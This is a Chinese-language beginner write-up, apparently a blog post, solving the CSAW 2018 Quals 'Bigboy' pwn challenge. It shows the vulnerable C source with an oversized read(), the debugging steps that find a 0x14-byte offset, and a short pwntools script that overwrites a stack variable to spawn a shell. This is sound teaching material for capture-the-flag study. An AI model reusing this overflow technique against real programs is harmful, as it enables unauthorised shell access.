pwn入门第一题-Csaw 2018 Quals Bigboy

题目链接
一道pwn50

查看源码

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void run_cmd(char * cmd){
    system(cmd);
}

int main(int argc, char ** argv){
    struct { //order enforcement from josh offsec
        char buf[17];
        int32_t x;
        int32_t y;
    } _holder = {
        {0},
        0xdeadbeef,
 	}; 
    puts("Are you a big boiiiii??");
    read(0,_holder.buf, 0x18);
    if (_holder.x == 0xcaf3baee)
        run_cmd("/bin/bash");
    else{
        run_cmd("/bin/date");
    }
    return 0;
}

read()函数有栈溢出
调试
在这里插入图片描述
断点打到read下一条指令
在这里插入图片描述
search-pattern 12345678 找到缓冲区
在这里插入图片描述查看缓冲区附近的栈内容
在这里插入图片描述
在这里插入图片描述
从12345678到deadbeef, 所以该缓冲区分配了8+ 8 + 4 = 20字节的空间, 即0x14

有了准确缓冲区大小, 就可以写exploit了, 目的是溢出覆盖_holder.x ← 0xcaf3baee, 就能绕过检查

from pwn import *
target = process('./boi')

payload = 'A' * 0x14 + p32(0xcaf3baee)
target.send(payload)
target.interactive()

用python2打, 一般的pwn都是用py2(大概)
在这里插入图片描述
拿到shell~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值